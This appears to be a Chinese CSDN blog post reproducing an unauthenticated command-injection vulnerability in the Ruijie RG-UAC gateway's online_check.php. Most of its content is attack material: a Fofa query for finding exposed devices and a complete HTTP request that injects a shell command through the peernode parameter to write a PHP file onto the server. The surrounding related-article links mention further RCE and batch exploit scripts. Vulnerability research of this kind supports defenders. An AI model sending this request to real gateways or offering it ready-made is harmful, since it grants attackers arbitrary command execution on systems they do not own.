锐捷RG-UAC应用管理网关 online_check.php存在命令注入

最新推荐文章于 2024-05-20 17:20:00 发布
最新推荐文章于 2024-05-20 17:20:00 发布
阅读量541 收藏
点赞数 11
分类专栏: 漏洞复现 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43567873/article/details/136565148
版权

简介

锐捷RG-UAC系列应用管理网关是锐捷自主研发的应用管理产品。

漏洞简介

锐捷RG-UAC应用管理网关 online_check.php存在命令注入漏洞,未经身份认证的攻击者可执行任意命令控制服务器权限。

影响版本

锐捷RG-UAC应用管理网关
Fofa:

app="Ruijie-RG-UAC"

漏洞复现

GET /view/vpn/autovpn/online_check.php?peernode=%20|%20`echo%20PD9waHAgcGhwaW5mbygpOw==%20|%20base64%20-d%20%3E%20test.php` HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d52cad02fa7c229ec2e0f5b2081451f6

了解本专栏 订阅专栏 解锁全文 超级会员免费看
今天晚上早睡觉
关注
  • 11
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
订阅专栏
锐捷RG-UAC 账户硬编码漏洞批量检测exp
06-17
-u 指定单个url -l 指定url文件 fofa搜索 title="RG-UAC登录页面" && body="admin",获取相关资产后保存到txt文件,然后使用此脚本批量检测
【漏洞复现】锐捷Ruijie-UAC online_check.php 命令注入漏洞
qq_67810151的博客
03-05 421
锐捷RG-UAC统一上网行为管理审计系统存在命令注入漏洞,未授权的攻击者可以通过该漏洞执行任意代码,控制服务器。
锐捷RG-UAC应用网关 前台RCE漏洞复现
0xSec
12-02 1287
锐捷RG-UAC应用管理网关 nmc_sync.php 接口处存在命令执行漏洞,未经身份认证的攻击者可执行任意命令控制服务器权限。
锐捷RG-UAC应用网关nmc_sync.php接口前台RCE
weixin_43567873的博客
03-08 61
锐捷RG-UAC应用网关nmc_sync.php接口前台RCE
锐捷Ruijie-UAC online_check.php 未授权远程代码命令执行漏洞】【漏洞复现】【漏洞poc】
weixin_43977052的博客
03-06 286
锐捷RG-UAC统一上网行为管理审计系统是星网锐捷网络有限公司自主研发的上网行为管理与审计产品。该系统可以部署在网络的关键节点上,通过路由、透明、旁路或混合模式,对数据进行2-7层的全面检查和分析。它深度识别、管控和审计数百种常见的应用,包括IM聊天软件、P2P下载软件、炒股软件、网络游戏应用、流媒体在线视频、移动应用、网络存储等。
锐捷RG-MTFi-M520车载Wi-FI 32MB编程器固件RG- MTF1-M520-v1.1. bin-网管
06-12
锐捷RG-MTFi-M520车载Wi-Fi固件。锐捷RG-MTFi-M520 32MB编程器固件,固件版本是16WiFi的
锐捷RG-MTFi-M520车载Wi-FI 32MB编程器固件RG- MTF1-M520-v1.1. bin-网管软件其他资源
06-11
锐捷RG-MTFi-M520车载Wi-Fi固件。锐捷RG-MTFi-M520 32MB编程器固件,固件版本是16WiFi的
RG-NBR系列网关设置WEB版,CONSOLE版,TELNET版。
06-15
第一手资源欢迎交流,学习。WEB版,CONSOLE版,TELNET版。
RG-EG系列出口网关RGOS配置手册.pdf
08-13
锐捷RG-EG系列出口网关配置手册,高清带图详细说明 包括基础配置、行为管理、路由、安全、网络管理、wlan方面
HCIP-Datacom-ARST自选题库_02_网络安全【道题】
2301_80961833的博客
05-20 477
为了防止黑客通过MAC地址攻击用户设备或网络,可将非信任用户的MAC地址配置为黑洞MAC地址,过滤掉非法MAC地址。中间人攻击或IP/MAC Spoofing攻击都会导致信息泄露等危害,且在内网中比较常见,为了防止中间人攻击或IP/MACSpoofing攻击,可以采取以下哪些配置手段?多远题461/805、为了防止仿冒DHCP服务器接入网络,可以在交换机上开启DHCP Snooping功能,配置步骤包括以下哪些选项?开启DHCP Snooping检查DHCP REQUEST报文中CHADDR字段的功能。
web安全之登录框渗透骚姿势,新思路
qq_47289634的博客
05-10 581
越权漏洞的挖掘大部分是通过对比两个用户的请求包以及响应包,来观察不同之处,有的时候替换一下响应包就直接越权,其中特别要关注的是uid,这里在挖掘逻辑漏洞和越权漏洞时建议使用burp中的compare模块进行两个数据包的比对,非常直观。width=500&height=100导致可以随意更改大小,配合脚本批量请求,很容易就会把带宽占满,造成dos攻击。不管漏洞挖掘还是挖SRC,登录框都是重点关注对象,什么漏洞都有可能出现,登录框也是框,见框就插就对了,说不定会有奇效。看到登录框,输入信息后,抓包。
网站有存在哪些类型的漏洞,网站漏洞存在哪些危害,该怎么解决网站漏洞问题
dexunyun的博客
05-14 359
通过使用漏洞扫描VSS服务,我们可以及时发现网站存在的漏洞,有效降低网站漏洞的风险,保障网站安全,满足合规要求。文件上传漏洞是由于网站在处理文件上传功能时没有对上传的文件类型、大小等进行严格的验证和过滤,攻击者利用网站中的文件包含函数,将恶意文件或代码包含到网站中,从而实现远程代码执行或文件读取。网站安全是一个持续的过程,需要我们不断关注,通过及时发现存在的漏洞,我们可以针对性的处理,这样可以有效地减少网站安全漏洞的产生和危害,确保网站的安全稳定运行。同时,采用安全的编程语言和框架,减少漏洞的产生。
Upstream最新发布2024年汽车网络安全报告-百度网盘下载
最新发布
qq_18209847的博客
05-20 137
Levy总结道:“在负责保护车队、电动汽车充电站和基础设施的网络安全利益相关者中,对汽车网络安全的重要性日益增加。特别是在GenAI日益普及的情况下,其降低了黑帽子行为者的进入门槛,使他们能够比以往更快、更有效地进行大规模攻击。这份报告的第六版着重介绍了汽车网络安全的拐点:从实验性的黑客攻击发展到规模庞大的攻击,并产生了怎样的影响。另外今年的报告还提供了关于网络攻击的财务影响的独到见解,它提供了一个可操作的框架,用于在现实场景中衡量网络攻击的货币影响。
【linux系统学习教程 Day03】网络安全之Linux系统学习教程,用户和用户组管理,创建用户,删除用户,创建组,删除组....
m0_67844671的博客
05-17 680
【linux系统学习教程 Day03】网络安全之Linux系统学习教程,用户和用户组管理,创建用户,删除用户,创建组,删除组....
AI时代的网络安全战:以智取胜,守护数字安宁
junge_sys的博客
05-14 348
在AI时代,网络安全已经不再是单纯的技术问题,更是涉及国家安全、社会稳定和个人隐私的重要议题。面对黑客利用AI技术的攻击升级,我们需要以智取胜,结合教育、技术、策略和协作,构建一个多层次、动态的防御体系。让我们携手共进,守护数字世界的安宁,共同迎接智能化时代的美好未来。
【网络安全】【Frida实战案例】某图xx付费功能逆向分析(一)
IT痴者
05-13 336
本次主要是日志分析,查看日志对应执行流程。查看关键信息。
CTF网络安全大赛简单的web题目:baby lfi
Pythonit教程网
05-17 484
这个HTML页面是一个简单的网页,标题为“Say Hello to our Gentlemen | LFI Warmups”,并包含了一些基本的Bootstrap样式和自定义的。题目 描  述: What about making things a bit harder?这个页面似乎是一个挑战或学习任务的起点,专注于一个名为“LFI Warmups”的主题。红客网:blog.hongkewang.cn。题目来源于:bugku。
锐捷RG-CS6000
10-26
根据提供的引用内容,没有提到锐捷RG-CS6000的具体信息。但是,锐捷在发布会上发布了RG-CS7010、RG-CS6000两款云服务器。其中,RG-CS7010云服务器性能强大,支持多种常用软件,大幅提升VDI桌面性能,满足更多场景...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值